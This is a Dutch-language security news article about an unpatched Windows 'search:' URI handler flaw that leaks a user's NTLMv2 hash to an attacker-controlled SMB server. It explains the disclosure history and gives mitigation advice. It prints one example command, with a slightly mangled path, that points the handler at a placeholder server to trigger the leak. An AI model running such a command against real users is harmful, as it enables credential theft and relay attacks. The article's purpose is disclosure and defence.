Cybersecurity-onderzoekers hebben details bekendgemaakt van een niet-gepatcht probleem dat kan worden misbruikt om de NTLMv2-hash van een gebruiker aan de aanvaller bekend te maken.
Net als in het geval van CVE-2026-33829, dat van invloed was op de ms-screensketch: URI-handler van de Windows Snipping Tool, bevindt het nieuw gemarkeerde probleem zich in de zoekopdracht: URI-handler, aldus Huntress.
CVE-2026-33829 verwijst naar een spoofing-kwetsbaarheid die gevoelige informatie aan een ongeautoriseerde actor zou kunnen blootstellen. Het werd in april 2026 door Microsoft gepatcht.
“Een aanvaller kan de gebruiker ertoe aanzetten op een speciaal vervaardigde link in een webbrowser of andere URL-bron te klikken, door deze in een webpagina of e-mailbericht in te sluiten”, merkte Microsoft destijds op in zijn advies.
“Als de gebruiker het starten van de link goedkeurt, kan de vervaardigde URL de computer ertoe aanzetten verbinding te maken met een SMB-server naar keuze van de aanvaller, waardoor de NTLMv2-hash van de gebruiker aan de aanvaller wordt onthuld, die deze zou kunnen gebruiken om zich als gebruiker te authenticeren.”
Het probleem had met name te maken met het feit dat de URI-handler van het Knipprogramma een parameter “filePath” accepteerde, deze niet valideerde en contact maakte met elk Universal Naming Convention (UNC)-pad dat eraan werd doorgegeven. Dit kan op zijn beurt NTLM-authenticatie activeren en de Net-NTLMv2-hash van het slachtoffer blootstellen aan de aanvaller.
De nieuw ontdekte tekortkoming bereikt hetzelfde einddoel met behulp van “search:” en “crumb=location:” in plaats van “filePath” met behulp van een commando zoals hieronder –
start "" "search:query=test&crumb=location:\10.0.1.100share"“Het gebruikte hetzelfde NTLM-lekmechanisme, produceerde hetzelfde Net-NTLMv2-lek, had dezelfde vereisten en had dezelfde gematigde beoordeling”, zei Huntress-onderzoeker Andrew Schwartz. Het is vermeldenswaard dat het gebruik van een “crumb” -parameter om de hash te stelen (CVE-2023-35636) in februari 2024 door Varonis werd gedocumenteerd.
Als gevolg hiervan zou een bedreigingsacteur de vastgelegde hash kunnen gebruiken om relay-aanvallen uit te voeren en diepere toegang tot een netwerk te verkrijgen. Na een verantwoorde openbaarmaking op 15 april 2026 weigerde Microsoft het probleem aan te pakken, met de mededeling dat “alleen belangrijke en kritieke gevallen van ernst voldoen aan onze lat voor onderhoud.”
Bij gebrek aan een oplossing wordt geadviseerd om uitgaande SMB (TCP/445 en TCP/139) te blokkeren op hosts die dit niet nodig hebben, SMB-ondertekening af te dwingen zodat vastgelegde hashes niet kunnen worden doorgegeven aan interne services, en NTLM uit te schakelen waar van toepassing.
